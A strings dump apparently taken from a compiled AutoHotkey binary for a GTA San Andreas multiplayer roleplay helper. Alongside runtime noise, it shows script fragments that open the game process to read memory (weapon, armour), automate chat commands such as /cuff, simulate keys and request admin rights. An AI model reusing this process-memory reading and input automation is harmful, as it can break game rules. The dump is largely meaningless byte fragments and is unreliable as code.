"GetModuleBaseNameW", "SVWATAUAVAWH", "DefDlgProcW", "u4fA9D$", ":;<=>?@", "WebRequest.Open(\"GET\", url, false)", "SUWAVAWH", "(t$`H", "Not a valid property getter/setter.", "GuiControl, 4:+cRed +Redraw, apt", "Alnum", "|$8fD", "|Ln\\u", "Flags", "agrave", "D$ H;", "RunWait", "t-fffff", "Error: ", "ClipWait", "9uu", "L$ VWH", "ControlGetFocus", "$Ib?s", "ByRef", "Critical Error", "Close", "A_A^A]A\\_][", "|$@A_A^A]A\\", "Button%s", "\\P{Xps}", "msctls_trackbar32", "A(H9t8", "<>H;} rzH", "d?000000`?", "IcF I", "9uu8f", "@8h#u", "IsVariadic", "IsCharUpperW", "Buddy", ".?AVCStringCharFromWChar@@", "NoTimers", "Description:", ".?AVInputObject@@", "fE9l$", "T$pE3", "Declaration too long.", "guihide()", ".?AVEnumComCompat@@", "IniRead", "?:kP<", "?8bunz8", "SHGetFolderPathW", "/>58d%", "GroupActivate", "Parameter #2 invalid.", "[[[[[Z", "if allrp=ERROR", "l$xE+", "runtime error ", "Shift", "WinActive", "Ccedil", "Parameter #1 invalid.", "not found", "D8c>u", " Hct$pMc", "D8a t", "alnum", "StringRight", "sendchat(\"/id \" id1)", "@SVWAWH", "<$)ux3", "A_A^A\\_^[]", "d$ UAUAVH", "Checked", "H;l$p", "GetStockObject", "v$H;{", "FindNextFileW", "AppDataCommon", "z'u%3", "gfffffffH", " A_A]A\\_^", "{All}", "GetWindowLongPtrW", "t'D8c#u", "Uy]E3", "HcT$\\H", "GetProcessHeap", "u/@8t$2D", "l$ WATAUH", "return", "MinSize", "Cyrillic", "ScreenWidth", "0Lct$xL", "D$p H", "Gujarati", "GlobalUnlock", "RControl", "A__^[]", "HeapSetInformation", "GetLastActivePopup", "SetBatchLines", "9wBE3", "GroupDeactivate", "l$(Hci0H", "?R0I?", "UseUnsetLocal", "@.data", " wTtI", "Sleep", "E9<$u", "fD9\\$`tVH", "Startup", "l$Hu I", "@VWAUAVAWH", "L$xD+\\$tL", "u$fA9", "%02X %03X", "r@8{^tB9{@vg", "L;|$xrKH", "PSAPI.DLL", "vAL;m", "x ATAUAWH", "AppendMenuW", ": NumGet(buf, type)", "ComObjCreate(\"SAPI.SpVoice\").Speak(text)", "truetrue PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX", "BatchLines", "- unable to initialize heap", "QD8u>t", "Unknown class var.", "TTTTTTTTT", "v!I;z", "Hotstring max abbreviation length is 40.", "TimeSincePriorHotkey", "ScriptName", "Fuchsia", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "GetTextFaceW", "PCREA", "700PP", "Speakers", "EPH9C", "FindFirstFileW", "ComObj", "SplashTextOn", "\\g is not followed by a braced, angle-bracketed, or quoted name/number or by a plain number", "ComputerName", " delete", "Pos%d", ">H;l$xs#H", "PA_A]A\\_]", "@UATAUH", "@UVAUH", "IniRead, rps, rp.ini, % ahk[i]", "oslash", "t}@8p", "Flash", "SSSSS", "IPAddress3", "H9l$@t)f", "t,Hc]", "#Requires", "L09A:", "t1L95f", "D9M8vHI", "ThisFunc", "l$XE3", "Suspend", "NoMouse", "GetKeyboardState", "?t @7d", "t$Ptu", "EnvMult", "v%I;}", "Active", "@SVWAVAWH", "failed to get memory", "0D8s#u", "Press [F5] to refresh.", "&Key history and script info", "D$`H9C", "MapWindowPoints", "ABORT", "D$`HcK", "SetWindowPos", "GetDlgItem", "D$@I;", "StartupCommon", "HeapCreate", "f#C\"fA", "IBeam", "L$xH;", "invalid UTF-8 string", "SUVWAVH", "A^_^[]", "StringFromGUID2", "D$HH;", "ubf9E", "A;\\$ s", "SendInput {f6}{end}+{home}{del}{esc}", "Toggle", "fA9l$", "BitAnd", "LoopRegType", "9uu?H", "FileCreateDir", "Redraw", "GetCommandLineW", "B0I9B0", "v'H;~", "L!l$HL!l$@", "#Hotstring", "L9Y0u", "McH,H", "SetRect", ")t$pE", "if !remed {", ";H9>&X", "RemoveAt", "`eh vector destructor iterator'", "fD92t", "RegRead", "a numbered reference must not be zero", "UTF-16LE", "USVWAUAWH", "SetParent", "IfWin should be #IfWin.", "(T?j?Y", "A0H9C`u", " with same name as a global", "Osmanya", "THORN", "\\$(E3", "__Set", "BringWindowToTop", "SetKeyDelay", "Buginese", "DateTime", "EndChars", "Unsupported method call syntax.", "Parameter default required.", "H9Y u1H", "(t$ f", "sendchat(RP)", "H;5($", "Mandaic", "CreateEllipticRgn", "-BH>t", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "MaxIndex", "settimer, password, 1", "A^A\\_^]", "D$DIc", "I)l$0", "v&I;\\$", "@8t$`u", "syntax error in subpattern name (missing terminator)", "GetDateFormatW", "Too many var/func refs.", "Aring", "[[[[[[[[[[[[[[", "ffffff", "EnableWindow", " A^A\\_", "H9;u^D8c", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[VVV", "D$`I9G", "ot$@H", "sendinput {space down}", "\\p{Xsp}", "GetFileSizeEx", "A)ETE3", "D$hfA", "t$pE3", "\\$PtAH", "GetSystemTime", "sendchat(\"", "l$ WATAVH", "[8H9x", "FindWindowW", "SendMessage, 0x50,, 0x4190419,, A", "REG_MULTI_SZ", "sendinput {w down}", "CreateProcessWithLogonW", "u0fA9l$", "d$XfA", "t$(M;|$(t", "FileGetAttrib", "YD$`f", "GuiControl, 6:, arbar, ", "#32771", "SetTextColor", "%.*s.Get%s", "t?=\"!", "IniRead, allrp, rp.ini, w%id%", "\\$xA;", "A_A\\_^]", "~0Au;H", "FINALLY with no matching TRY or CATCH", "VVVVVVVVVVVV[[[[[[[[[[[[[[[", "8D$AH", "WriteConsoleW", "NumpadEnter", "\\ at end of pattern", "L$@E3", "A_A^A]_^", "MonthCal", "D8d$Ht", "Š", "0x%Ix", "A^A\\_^[]", "t;fff", "t$(M;", "D$PfD", "|$@~H", "8uu?H", "PA\\_^", "CLSIDFromProgID", "L$XfA", "NumPut", "@UVATAUH", "|5PBt5A", "IcqHI", "CaretY", "DestroyWindow", "K~Je#>!", "CurrentLine", " !\"#$%%%%%%&&'()*+%%%%%%&&'()*+,,,,,,--./012QQQQQQQQ334556789999:;<;<=>=?@AB=?@ABQQQQQCDEFGHIJKLMN", "ytjA+", "|$ ATAUAVH", "Simple", "internal error: unexpected repeat", "Margin", "Missing \"key:\" in object literal.", "Exception", "|$0x8f", "v$L;s", "t1L9=", "E;~$}\"A", "H;B0}", "-------------------------------------------------------------------", "D8m#u", "Limbu", "CreateToolhelp32Snapshot", "D8h#u", "{uffA", "sleep 500", "gui, 1:add, text, cWhite vM4 x0 w250 Center, % ahk[i+1]", "%sGlobal Variables (alphabetical)%s", "L$2f9", "[[[[[[[[[[[[[[[[", "MouseClick", "IcEPD", "tcf90H", " {address: 0x%IX}", "Missing \"]\"", "d$ D8a<", "EnvUpdate", "A^A\\_[", "u8fD9{", "GetPropW", "SetWinDelay", "GetTopWindow", "T$\"fD", ")t$pff", "l$0L9c", "T$HH;", "|$DD9d$X", "sbfD;", "NoDefault", "GetPrev", "e A_A^A]A\\]", "NoHide", "missing )", "0.0.0.0", "Default", "%u.%u.%u.%u", "GetSystemPaletteEntries", "Verb: <%s>", "GetCount", "Owner", "ImageList_ReplaceIcon", "open \"%s\" alias AHK_PlayMe", "__New", "Call to nonexistent function.", "@UVAVH", "8D$1H", "H;D$H", "@SVAUAWH", "October", "CallNextHookEx", "uUE8|$", "C$9C |(", "v+L;c", "@USVWH", "NumpadClear", "L$ SUWATAUAVAWH", "HKEY_CLASSES_ROOT", "Digit", "WIN_2003", "uSfE9M", "LoopFileExt", "DestroyIcon", ">jtm}S", ".?AVFunc@@", "State", "BC?>6t9^", "Paused threads: %d of %d (%d layers)", "f93u=", ";} s-H", "Invalid memory read/write.", "Length", "Too many tab controls.", "Failed attempt to launch program or document:", "(*VERB) not recognized", "micro", "0A_A]A\\", "9uu=H", "nid:=WeaponId()", "MapVirtualKeyExW", "ecirc", "u\"D8w#H", "RedrawWindow", "R6033", "LcKDH", "aring", "IsCharAlphaW", "SUATAVH", "contains", "r#fA;", "t!H9s", "SetScrollLockState", "IconFile", "FileRecycle", "\\P{Lu}", "GetStringTypeW", "Single", "t3ffff", ".i?0@I", "AUAWH", "\\$ Hc", "{RCtrl up}", "MB_GetString", "v!H;s", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "ExcludeClipRect", "Unexpected function", "|$xD;", "LoopFileTimeModified", "&Refresh", ";:u,H", "d$XH+", "L$XH3", "#MaxThreads", "SetWindowsHookExW", "Run *RunAs %A_ScriptFullPath%", "ControlDelay", "GetNext", "CD9C@r'H", "t0D9=q", ")t$`H", "SendInput {f6}^a/id %nick1%_%nick2%{enter}", ";D$p~SLc", "SendRaw", "WheelUp", "FindClose", "Rejang", "FlashWindow", "MaxParams", "DefaultMouseSpeed", "Full class name is too long.", "LcKDL", "xpxxxx", "id:=WeaponId()", "f97u*", "RtlLookupFunctionEntry", "[[[[[[[[[[[[[[[[[[[[[[[[[", "\\p{Xan}", "H98t!", "(E;~ ", "TrackPopupMenuEx", "Vr.>T", "InternetOpenW", "D W?{W", "H+D$@H", "RegRead, gtapath, HKEY_CURRENT_USER, Software\\SAMP, LauncherDLL", "RCtrl", "Parse", ";|$P|", "A_A^A]A\\^[]", "D$@O", "s H9k ", "L$HL9e", "- unexpected multithread lock error", "%s (in function %s)", ";D$\\A", "%s[%Iu of %Iu]: %-1.60s%s", "K SVAUAWH", "8A]_^[", "return false", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "`eh vector vbase constructor iterator'", "UTF16)", "LoadCursorW", "tmE8h", "*StO9>T", "not between", "Handle", "Media_Prev", "l$ VATAUAVAWH", "findline(text, i:=0) {", "RegView", "u28D$0D", "E0fD9(uAA", "Imperial_Aramaic", "TLOSS error", "CaretX", "SendInput {F6}", "String too long.", "fD9+t?A", "fD9't", "UUUUUU", "global auth:=0", "NumpadUp", "H;T$prPLcL$xH", "9_ v2", "5@8{#u", "?|u=H", "lower", "acute", "BitNot", "Egrave", "L$&fD", "Delimiter", "D9d$ ", "DesktopCommon", "LoopRegKey", "CreateCompatibleBitmap", "pA_A^A]A\\_^]", "invalid UTF-16 string", "t$HD;", "$L9_H~WH", "@UVWATAUH", "GetPrivateProfileSectionW", "sendinput {d down}", "Escape", "ACCEPT", "underline", "L$PHc", "iniread, fam, rp.ini, settings, fam", "Ctrl+E", "D$SA;", "Gui, 5:Destroy", "sleep 1050", "A+O(H", "`vector vbase constructor iterator'", "Ol_Chiki", "IsIconic", "D$PA9", "ExitProcess", "gui, 5:add, text, x10 y20 w250 cRed vpstatus, ", "l$(E3", "SUWATAUH", "HcG$H", "A_A]A\\", "TRYAGAIN", "$D8q#u", ".?AVComObject@@", "EnvAdd", "CreateWindowExW", "CallWindowProcW", "8ut)H", "\\$Pf9", "global i = 1", "StringLeft", "|$ ;=f", "Rename", "IsCharLowerW", "A window class is required.", "Mffff", "hA^A\\", "t$`L+", "Focus", "EL$0H", "GetForegroundWindow", "Run, Z:\\Games\\gtarp_crmp\\samp.exe 51.83.170.116:7777,, UseErrorLevel", "uDI9v", "CoordMode Pixel, Screen", "UVWATAVH", "Visible", "RP := RegExReplace(RP, \"\\Q$\\Erank\", rank)", "^+!#{}", "D8t$@", "Timeout", "[[[[[[[[[[[[[[[[[[[[", "if (inveh()>0) {", "T$PHc", "WindowSpy.ahk", "Gui, 6:+ToolWindow -Caption +Owner +AlwaysOnTop +E0x20", "|$`fB9tc", "DL>fD", "PCSpeaker", "I9L$Hw", "NOPPQ", "\\$pE3", "`vector vbase copy constructor iterator'", "VisibleNonText", "atilde", "Lc@0J", "YD$0H", "T$PE3", "- not enough space for arguments", "ControlGetPos", "D$hE;", "L$Df;", "number after (?C is > 255", "colSettings := objWMIService.ExecQuery(\"Select * from Win32_OperatingSystem\")._NewEnum", "gui, 6:color, black", "brvbar", "ahk_parent", "Georgian", "=>?@A", "PeekMessageW", "Can't open clipboard for writing.", "%s.%s", "Space", "—", "The maximum number of Folder Dialogs has been reached.", ";_ sKH", "lid:=id", "t-LcJ@H", "This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.", "MonitorCount", "Int64", "8ke?;", "Len%s", "USVWATAUAVAWH", "E8H9E", "L$08Y#u", "!WheelUp::", "fD9#tSH", "‚", "`local static guard'", "WinWait", "Braille", "R6008", "HcL$HH", "@A^A\\^", ";7sUH", "D$HfD", "`copy constructor closure'", "OpenClipboard", "D8d$@u5D8d$Au.H", "WinActivateBottom", "u%L9s", "CloseHandle", " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~", "l$hE3", "DeleteObject", "aelig", "’", "AVAWH", "Jumps cannot exit a FINALLY block.", "SizeAll", "sendchat(text) {", "if not GetKeyState(\"%s\")", "Extra", "CoordModeMenu", ";D$0A", "GetShortPathNameW", "- abort() has been called", "SendMode", "Tray menu must not be deleted.", "H9JHvufffff", "Button", "uacute", ";k0}AH", "reference to non-existent subpattern", "NOTE: To disable the key history shown below, add the line \"#KeyHistory 0\" anywhere in the script. The same method can be used to change the size of the history buffer. For example: #KeyHistory 100 (Default is 40, Max is 500)", "YWeek", "v'L;f", "GetWindowThreadProcessId", "Pixel", "GetKeyboardLayoutNameW", "GroupClose", "Too many menu items.", "Monitor", "ColClick", "D$HL+", "D$#A8D$\"rJ", "ty@85", "tED8p#u", "L;-{3", "[[[[[[[[[[[[", "j?V()", "WinExist", "mixerGetLineControlsW", "T$4A;~ ", "HcM H", "OpenProcess", "Numpad4", "u@D9-", "@VWAUH", "@8x7u", "7HcO$H", "Press OK to continue.", "D$hA;w ", "LL0t#H", "@8{#t", "JoyPOV", "PostMessage", "`h`hhh", "SetMenuItemInfoW", "{Raw}", "!WheelDown::", "mixerGetLineInfoW", ":>t6k'", "&File", "HcB,A", "SendInput", "Enable", "Analog", "•", "apt:=!apt", "PA_A]A\\_^][", "CL:>8", ".?AUIDispatch@@", "gui, 1:font, s16", "prread(hProccess, dwAdress, type := \"Int\", numBytes := 4) {", "__clrcall", "NumpadSub", "Syntax error or too many variables in \"For\" statement.", "f90t;H", "Lydian", "IntersectRect", "__Delete", "C f9E", ": %sar1%", "Gui, launcher:Add, Button, x22 y319 w270 h50 gbtnstart, ", "SetFormat", "A^A]A\\_^][", "fD93t(H", "Literal commas and percent signs must be escaped (e.g. `%)", "Unknown exception", "Too many parameters passed to function.", "rp := RegExReplace(rp, \"\\Q$\\Esec\", time.s)", "RAMDisk", "- floating point support not loaded", "ocirc", "time:=gettime()", "D95G1", "Continue", "#32768", "GetClipboardData", " Base Class Array'", "t$ WH", "rIH+D$`LcL$xE", "WinWaitNotActive", "`managed vector destructor iterator'", "@SUVWH", "T$@Hc", "Egyptian_Hieroglyphs", "L$ USVWH", "v(H;s", "~sfA;", ">AUTOHOTKEY SCRIPT<", "ErrorLevel", "LocalFileTimeToFileTime", "_cabs", "egrave", "GetWindowTextW", ")t$P<", "BitBlt", "Memory limit reached (see #MaxMem in the help file).", "(D;g ", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "password(){", "L$0H;", "keybd_event", "Bengali", "Latin", "AK>(v", "T$@f;", "IfInString", "HasKey", "USVWATAUAVH", "A_A^A]A\\_^[]", "H9|$0t", "`A^_]", "A_A]_^[]", "f92t H", "IsLabel", "9kTtB", "BitShiftRight", "SetKeyDelay -1, -1", "Aacute", "UVWATAUAWH", "mixerOpen", "HcL$X", "vLHcB,H", "u,D8m", ".?AVbad_alloc@std@@", "iniread, y, rp.ini, settings, y", "Runic", "CheckMenuItem", "@UATAUAWH", "return input", "CONOUT$", "9|$pt", "D8Q#I", "(;N r", "0A_A^A]A\\_^[", "9Y vM", "invalid escape sequence in character class", "IfWin", "Oslash", "D$0H9C", "ar:=GetArmour()", "A^_^[", "fA9\\$", "Submenu must not contain its parent menu.", "@SATAUAVAWH", "L;-V5", "A^A]_][", "!This program cannot be run in DOS mode.", "\\,", "Agrave", "9D$@t", ":?:/acuff::", "&#%d;", "Standard", "KeyDown", "ComSpec", "%s.%.*s := %.*s, ", "Region", "Too many controls.", "Cannot jump from inside a function to outside.", "D8o#u", "SVATAUAVH", "BitXOr", "Launch_Mail", "This hotstring is missing its abbreviation.", "Canadian_Aboriginal", "l$@Lc", "EL$8H", "Theme", "`A\\_]", "Alpha", "U(A9V ", "t+fE9", "u D8%*", "Ambiguous or invalid use of \".\"", "SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\", "\\$ UVWATAWH", "D$PHcE", "&Suspend Hotkeys", "@SUATH", "I9L$Hve", "UnhookWindowsHookEx", "fD9|$0", "j>>A?1", "HcT$0A", "l$8D8s#u", ".?AVexception@std@@", "(t$ H", "Otilde", "t1L95", "Removable", "D$^L;", "9D$ u@", "fD9'u", "SetTimer, hud, 100", "u-@8=@X", "@\"=`+", "A_A^A]A\\_^]", "D$`E3", "POSIX collating elements are not supported", "GetVolumeInformationW", "WHILE", "v%H;O", "D$0Mc", "FlsGetValue", "u2f9C", "ImageList_Destroy", "D$BE2", "joypoll", "Ocirc", "t\\D8s(tAD85@", "|$@uF", ".?AVComArrayEnum@@", "D8c=upD8c>tjf", "SetTitleMatchMode", "CountClipboardFormats", "SoundGet", "v!L;k", "u0fE9|$", "A fA9", "t&L+UX", "Pos%s", "@A\\_^][", "fD9", "D$0E3", "@8|$HtT", "9\\$ ~>H", "SoundSetWaveVolume", "WSOCK32.dll", "GetOpenFileNameW", "SetClipboardViewer", "H9A u/H", "IniWrite", "Select File - %s", " 'L>[", "L$Xu@E3", "v!H;{", "T$iLc", "SeShutdownPrivilege", "SystemParametersInfoW", "[SSSSSSSSSSSSS[[[", "waveOutSetVolume", " (.*)\\Q[\\E(.*)\\Q]\\E\") == -1", "CreateDCW", "sendchat(\"/cuff \" id2)", "@SUVWATAUAVH", "Equalizer", "u%8D$0D", "number too big in {} quantifier", "t$ AT", "A+C0H", "GetDlgCtrlID", "0X8b?~", "A>pP&", "SetEnv", "CreateDIBSection", "xQfff", "Parameter #2 must not be blank in this case.", "IsCompiled", "CreateWindow", "Menu item name too long.", "fD9)t", "!numpad0::reload", "- not enough space for environment", "A#E;M", "r$I+I(A", "FindResourceW", "E6D8u>t3;", " A_A^A\\_[", "t$XH9A", "Browser_Back", "Process32NextW", "D$ L;", "SetWindowTheme", "StartMenuCommon", "d$ fE9", "[[[[[[[[", "Transparent", "T$0H#", "DropFiles", "%s up::", "ccedil", "D8s#tY", "fE9)u", "4IcD$", "Empty variable reference (%%).", "December", "closing ) for (?C expected", "RaiseException", "H+U(H", "#MaxThreadsPerHotkey 250", "sendchat(\"/me ", "A;E |", "IsZoomed", "(t$PH", "8C4uDH", "WinGetPos", "@text", "ScreenHeight", "&", "D8p#t", "l$ VATAVH", "f9l$ tWH", "GetKeyState", "status cdaudio mode", "“", "RP := A_LoopField", "X_^[]", "Number", "IniDelete", "D$,D+\\$ +D$$D", "GetModuleFileNameW", "|# Lc", "Thread", "t$0E3", "gui, 1:color, Black", "Selected", "A^A]]", "Lepcha", "@A^A\\_", "Process Exist, gta_sa.exe", "SysGet", "&Help", "v(H;~", "v'L;n", "OpenProcessToken", "EnvSub", "gui, 5:add, text, x10 y40 w250 cWhite vpname, ", "tUH;N", "ControlClick", "VisibleText", "return prread(getprocessid(), 0xBAA410)", "`vector constructor iterator'", "T$HE3", "0A\\][", "‡", "AhkVersion", "H;D$xu", "l$8t$", "- CRT not initialized", "VirtualFreeEx", "Khmer", "LcGTH", "SetErrorMode", "3>N;kU", ":?:/apt::", "JoyButtons", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "E&xit", "<$:ubA", "Suspend, on", "HideDropDown", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "yac:=A_ScreenHeight - 40", "Master", "\\AutoHotkey.exe", "Force", "DllCall", "GetSystemMenu", "š", "HcT$4A", "~ID;c", "RegisterClassExW", "CaseSensitive", "MaxSize", "LegalCopyright", "unrecognized character after (?<", "If WinActive(\"GTA:SA:MP\") {", "0A\\_]", "t$\\;t$X", "D$ Hc", "WinMove", "Nonexistent hotkey.", "COMMIT", "D;T$X}nH", "R6024", "Can't create font.", "inconsistent NEWLINE options", ".>PJ;I:qE>", " A_A^A]A\\^", "shlwapi", "SetFilePointer", "H9k@tNH", "mgun:", "GetPrivateProfileSectionNamesW", "u*H9\\$ht#H", "while i < 5", "CreateCompatibleDC", "atan2", "menu()", "NoStandard", "t<0u&A", "January", "CreatePatternBrush", "v'H;n", "+t$X+\\$\\H", "Numpad6", "All Files (*.*)", "D8{#u", "character value in \\x{...} sequence is too large", "LoopFilePath", "u$E8|$", "v(H;w", "EmptyClipboard", "Switch", "___[`[aabccccccccccccccccc[cccccccccdeeebfffffffffffffffffgfffffffffhiijklmmmnopXYXYXYXYXYqrqrqrqrqrqrqrstubvwxXYyXYbzzz{{{{{{{{{{{{{{{{||||||||||||||||||||||||||||||||}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}~~~~~~~~~~~~~~~~", "Missing \"]\" before \":\"", """, "gui, 6:add, text, cRed vhpbar, ", "/fD9m", "D$HD8", "D8a#u", "FlsSetValue", " Complete Object Locator'", "if A_LoopField", "xotmH", "SAUAVAWH", "Browser_Home", "} else {", "BindMethod", " (.*)\\Q[\\E(.*)\\Q]\\E\")), \"", "button", "l$ VWAUH", "#NoEnv", "AHK Mouse", "9ut$H", "~&I;t$0}", "Samaritan", "Execute() {", "properties", "(t$0H", "WritePrivateProfileSectionW", "u9fE9|$", "gui, 4:hide", "C;_X|", " {wrapper: 0x%IX, vt: 0x%04hX, value: 0x%I64X}", " A^A]A\\", "MaximizeBox", ":L$Qw", "global ahk := Array()", "SendInput %pass%{enter}", " id:%A_Space%", "Index", "TransColor", "A^A]A\\_[]", "Microphone", "f9>u!", "fD9|$0t", "StrLen", "GetDiskFreeSpaceExW", "L$ I;", "fffff", "SetLayeredWindowAttributes", "t$@fA", "RButton", "Len%d", "*9{@v%f", "(t$PL", "t ffff", "@A\\^[", "9N v!H", "f9l$ tXH", "fE9&u", "KeyOpt", "Access violation - no RTTI data!", "T$@fA9", "LoadImageW", "ListVars", "LWin ", "TTTTTTTTTTTT", "pA^A]A\\_^][", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "SendInput /r [%tag%] ", "WIN_8", "fD9.u\"", "\\$`Hc", "WritePrivateProfileStringW", "Fixed", ">ERCPH", ".?AVbad_typeid@std@@", "FileGetShortcut", "no error", "YDay0", "PtrSize", "IsCritical", "WinDir", "IsAdmin", "Checkbox", "C;t$P", "‰", "space", "t$xE2", "T$pH3", "uCf9C", "›", "#NoTrayIcon", "Max hotkeys.", "A)ETA", "~T;G ~", "fD9\"u", "t$`fA#", "TitleMatchModeSpeed", "__Delete will now return.", "G 9G$u", ".?AV?$CKuStringT@DVCKuStringUtilA@@@@", "SetUnhandledExceptionFilter", "l$6t@E", "SSSSSSSSSTTTTTTTTT", "#InstallMouseHook", "&Lines most recently executed", "GetCurrentProcess", "- unexpected heap error", "SoundBeep", "The maximum number of File Dialogs has been reached.", "|L<\\t", " data", "support for \\P, \\p, and \\X has not been compiled", "Return", "Ready", "@tBE3", "function", "L$XtRH", "fD9?u4", "t$@E3", "fD9&tkfD9#H", "rp := RegExReplace(rp, \"\\Q$\\Emin\", time.m)", "ControlSend", "D$BHc", "Not a valid method, class or property definition.", "l$@fD", ".?AVbad_exception@std@@", "ScreenToClient", "SetBkMode", "OwnerLink", "NumpadLeft", "if autogun", "RegDelete", "RIGHT", "Can't delete items (in use?).", "\\k is not followed by a braced, angle-bracketed, or quoted name", "OleInitialize", "L$ UVWATAUH", "_fD9#u", "` AVH", "UnregisterHotKey", "The program is now unstable and will exit.", "8Z!tX", "MM/dd/yy", "Warning", "0A^A]A\\", "`default constructor closure'", "octal value is greater than \\377 in 8-bit non-UTF-8 mode", "v%L;o", "Numlock", "t$ WATAUH", "SplashImage", "DetectHiddenText", "A_A^A]A\\_^][", "@8x#u", "D$HH+", "Numpad8", "global hpwarning:=0, arwarning:=0", "L$$E2", "D$8+D$0D+\\$4D", "ControlSendRaw", "ThisLabel", "StatusBarGetText", "<>#n2", "__Get", "Programs", ";X<}`M", "PrintScreen", "remed:=0", "\\$ VH", "uMfE9M", "RtlCaptureContext", "R6002", "Shell_TrayWnd", "__Init()", "strike", "SVWATAUH", "Phoenician", "&Window Spy", "InvalidateRect", "- unable to open console device", "CDROM", "missing terminating ] for character class", "if RegExmatch(getchatline(i), text)", "LoopFileSizeMB", "@SWATAVH", "v%H;_", "LockResource", "fD9;t", "D$`H9E", "\\p{L}", "|$ E3", "l$ VH", "this version of PCRE is compiled without UTF support", "H!|$ L", "subpattern name is too long (maximum 32 characters)", "SetLabel:", "d$8L9k", "False", "Segoe UI", "H9y0u", "CoCreateInstance", "D$pH;", "DwmGetWindowAttribute", "Expected Case/Default", "Meetei_Mayek", "t8L9@", "Short", "%i-%i", "\\$8L3", "Disabled", "A]A\\_^[]", "Lucida Console", "HelpContext:", "StringFileInfo", "|$ 9;", "Thursday", "GetAddress", "\\$0D8k#u", "USER32.DLL", "GetMenu", "CurrentCol", "8A_A^A]A\\_^][", "FileVersion", "v(M;E", "L$Xf9", "H;|$@rKH", "EnableMenuItem", "Section", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "New_Tai_Lue", "ERCPu", "alpha", "Can't create control.", "GlobalFree", "@SUATAWH", "Gui, 4:+ToolWindow -Caption +Owner +AlwaysOnTop +E0x20", "ComObjArray.Enumerator", "@WATAUAVAWH", "Silver", "VWAUH", "JoyAxes", "AutoHotkey.chm", "BSR_ANYCRLF)", "@WATAWH", "H9.stI", "Can't Open Specified Mixer", "L$HH3", "The script could not be reloaded.", "t$0tF", "8*uFH", "D8|$At`", "SetMouseDelay", "C\" uS", "Cherokee", "\\$ WH", "Missing \"}\"", "No valid COM object!", "LcL$XD", " Base Class Descriptor at (", "tBD9-6", "Missing class name.", "StringGetPos", "v%I;_", "uZE8h", "Query", "T$@E3", "Break/Continue must be enclosed by a Loop.", "G98G8r0", "Oriya", "Ecirc", "D8g#u", "D8e_t", "FileRemoveDir", " !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~", "Bopomofo", "EnvGet", "lookbehind assertion is not fixed length", "SetWindowRgn", "d$PMk", "1.1.37.01", "8D$Pt", "d$0H9k", "Event", "gui, 6:show, x%xh% y%yh% NoActivate, ", "sleep 125", "GetFocus", "P>q_Y~", "DefaultGui", "HcD$HH;", "E;,$|", "URLDownloadToFile, https://twl.su/favicon.ico, C:\\PA\\Logo.ico", "Maximize", "R6031", "Maroon", "'D8\\$Tu4", "A\\_[]", "t?@8-", "GetChild", "I9OHr", "AlwaysOnTop", "JoyInfo", "R6025", "uKfE9|$", "LoopFileLongPath", "Continuation section too long.", "Format", ">[uFH", "NumpadHome", "FileDelete", "j@8{#u", "|$ UATAUAVAWH", "`omni callsig'", "IcK`I", "Group", "tAffff", "GetCurrentProcessId", "v'L;o", "This control type should not have an associated subroutine.", "t$TQ", "A_A^_]", ".?AVbad_cast@std@@", "Shutdown", "D;I$}", "L$x+L$ D", "Submenu does not exist.", "L$8H;L$@rQH+", "D$PL9oXt", "GetFileAttributesW", "rp := RegExReplace(rp, \"\\Q$\\Ehour\", time.h)", "EncodePointer", "+D$ Hc", "#MaxThreads 1000", "u(8D$`@", "D$pu;H", "gui, 4:font, s16", "#UseHook", "ModifyCol", "€", "H9A8t", "l$ VATAUH", "frac34", "if !processHandle := DllCall(\"OpenProcess\", \"Int\", 24, \"UInt\", 0, \"UInt\", processID, \"Ptr\")", "GuiWidth", "9{P~93", "HcC H", "(A^_^[", "GetComputerNameW", "@SVATH", "A label must not point to a function.", "Iacute", "WinGetText", "E|$(H", "\\$@fD", "D$(yeE3", "GlobalAlloc", "InsertMenuItemW", "TaskbarCreated", "u@D8`", "Note: The hotkey %s will not be active because it does not exist in the current keyboard layout.", "Invalid hotkey.", "D$h+D$`E8", "|$@I;", "Sinhala", "@SWATAUAVH", "&?PPPPPPP?", "(t$@I", "lstrcmpiW", "A]A\\]", "Telugu", "H+T$0JcL8", "Parameter #2 required", "v%H;k", "LoopFileShortPath", "This dynamic variable is blank. If this variable was not intended to be dynamic, remove the % symbols from it.", "__cdecl", "H;|$p}", "GetACP", "@8p]t", "pound", 